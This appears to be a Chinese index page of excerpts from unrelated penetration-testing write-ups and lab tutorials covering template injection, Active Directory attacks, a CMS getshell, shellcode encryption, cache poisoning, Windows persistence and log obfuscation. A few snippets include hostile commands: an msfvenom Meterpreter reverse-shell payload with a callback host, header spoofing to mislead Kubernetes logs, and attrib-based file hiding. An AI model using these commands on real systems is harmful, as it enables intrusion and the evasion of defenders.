文章前言 从之前的文章中我们分析后发现Thymeleaf 3.0.15版本中只要检测到"{"就会认为存在表达式内容,随后直接抛出异常停止解析来防范模板注入问题,此类场景用于我们URL PATH、Retruen、Fragment等可控的情况下进行,但是如果我们存在对模板文件进行更改、创建、上传等操作的时候我们还可以精心构造恶意的JAVA代码并将其写入模板中,随后触发执行 常规执行 使用之前的载荷进行
0x1 前言 哈喽,师傅们! 这篇文章主要是带师傅们掌握下地图API配置错误漏洞导致的key或者ak泄露,然后进行使用我们总结的payload进行打一个漏洞利用。下面也会给师傅们举例我挖到的部分地图API漏洞,其中企业src部分企业会收这个漏洞,部分不收,我之前在众测挖的这个漏洞,收的多点。 0x2 地图API简介 一、Web服务API简介 高德/百度/腾讯Web服务API向开发者提供HTTP接
实验环境:https://tryhackme.com/r/room/credharvesting 0x01 凭据收集 本文将讨论如何利用已经获得的AD凭据来进行横向移动以及访问AD环境中的资源的基本知识,以及展示如何获取、重用和模拟用户凭据。 AD凭据收集主要是指攻击者如何获取用户凭据(如登录信息、帐户名和密码),它是一种从目标系统的不同位置(如明文文件、注册表、内存转储等)尝试提取有效凭据信息
AD Exploitation 实验环境:https://tryhackme.com/jr/exploitingad 0x01 AD Exploitation 在我们已经完成针对目标AD网络的内部侦察(AD枚举操作),并了解了关于目标AD结构和企业网络环境的基础情况之后,我们就到了针对目标AD进行漏洞利用的阶段。在漏洞利用(针对目标AD)阶段中,我们通常会利用一些错误的AD配置来执行横向移动以及权
一、从信息收集到敏感信息泄露 拿到靶标之后第一件事首先是信息收集,找到该站点的一个登录页面 首先是进行常规的sql注入,弱口令,没有任何收获之后开始F12查看js代码 从源码里面发现大量接口泄露 接着用jsfinder提取出来 找到挺多的找到大约有1000个接口地址 然后直接bp遍历接口 遍历到某个接口的时候明显卡了一下,长度也不对劲,点开发现有大量敏感信息泄露 (原谅我码的有点重,因为泄露
AD Enuming 实验环境:https://tryhackme.com/jr/adenumeration 枚举AD 在次实验中,我们主要将介绍以下几种用于枚举AD的技巧: Microsoft管理控制台的AD snap-ins(管理单元)。 命令提示符界面(CMD)中的net命令。 PowerShell的AD-RSAT cmdlet。 Bloodhound。 实验环境: 0x02凭据注入
记一次最新版DeDecms 绕过层层过滤getshell过程 前言 最近织梦也是发了最新版的,最近也是遇到了使用织梦搭建的网站 当时是进了后台,然后最后也是成功getshell了,因为各种原因,使用本地搭建的环境给大家做一次分享,仅供学习 环境搭建 只需要下载最新版的就好了,然后使用phpstudy搭建 getshell过程 后台如下 然后点击模块,文件管理处 发现可以编辑文件 正当我以为手
摘要 本文介绍如何编写汇编代码来实现shellcode的异或解密 在shellcode执行时首先异或解密以提取嵌入的木马代码,然后执行解密后的shellcode Msf msf生成初始shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.135.141 lport=4444 -f c -o shellcode.c
前言 自从James Kettle在2018年发布了一篇介绍缓存投毒的论文以来,缓存投毒逐渐引起了广泛关注。虽然截至2024年,缓存投毒技术已经相对成熟且不再新鲜,但在国内的关注度似乎仍然较低。为此,笔者开发了一款用于检测各种类型缓存投毒漏洞的工具,详见 wcpvs 仓库。本文将详细介绍该工具在扫描CPDOS缓存投毒漏洞中的应用,后面应该还会有一篇其他漏洞和缓存投毒结合的文章。 缓存投毒 缓存投毒
简介 接到一个安全测试任务,数据包使用安全控件进行了加密。通过开发插件,实现明文测试,最终发现了2个越权。 加解密过程分析 访问网站首页,需要先安装一个控件。安装完成后,访问网站发现数据包加密处理。 按照以前的测试思路,先打开发浏览器开发工具,根据关键字“encrypt”进行搜索,搜索得的到的结果非常多,不知道从何分析起。 无意间查看开发工具的网络请求模块,发现请求127.0.0.1的流量中,有
记!一次供应链导致教育漏洞通杀,通杀五十多个学校弱口令,SQL注入,越权修改密码!(新手小白也能看懂的文章) 前言: 小编认为哈,就现在来讲,对于教育系统来讲,信息收集还是很重要的!但是像什么什么大学比较显眼的 "统一认证登录"||"学生综合管理",基本上弱口令是不太行,别的漏洞的话好多也都被大佬们打完了或者利用上不太容易(菜鸟的内心崩塌),所以我们可以扩大咱们信息收集的范围-->供应链,利
Windows权限维持 文件隐藏 隐藏文件 使⽤Attrib +s +a +h +r命令就是把原本的⽂件夹增加了系统⽂件属性、存档⽂件属性、只读⽂件属性和隐藏⽂件属性。 attrib +s +a +h +r test #将test文件夹隐藏 这种方法在windows11上未成功,但是在windows8.1上面尝试成功,显示隐藏文件仍然是无法查看到,cmd dir命令也未查看到 系统⽂件夹图
一、前言 在红蓝对抗中,进程内存是兵家必争之地。例如,知名的 Mimikatz 工具(用于提取计算机密码和哈希值)就是通过操作内存来实现的。然而,由于操作内存极为繁琐且复杂,并且大部分软件的特性不一致,导致投入产出比相对较低,所以研究这一领域的人相对较少。 然而,在 Java 安全领域,内存对抗相对较为常见。由于 Java Instrument 机制(在内存中修改类)以及反序列化漏洞,可以通过代码
一、前言 最近在做k8s的防御策略,以攻击者视角去思考下,发现可以对k8s的日志进行混淆,增加防御侧溯源的成本。 二、混淆来源IP 2.1、两个可以伪造的header头 k8s日志会记录两个Header头的IP:X-Forwarded-For、X-Real-IP 这里伪造X-Forwarded-For头 curl --cert /root/.minikube/profiles/minikube/c
0x00 环境搭建 https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ 网络拓扑图 0x01 Centos7 1.1 信息搜集 fscan扫一波 ./fscan -h 192.168.239.111 fscan将ssh密码扫出来.......还是走正常流程打,访问公网IP1回显是宝塔的页面,8888,888一顿测试没发现什么功能点先放这 1.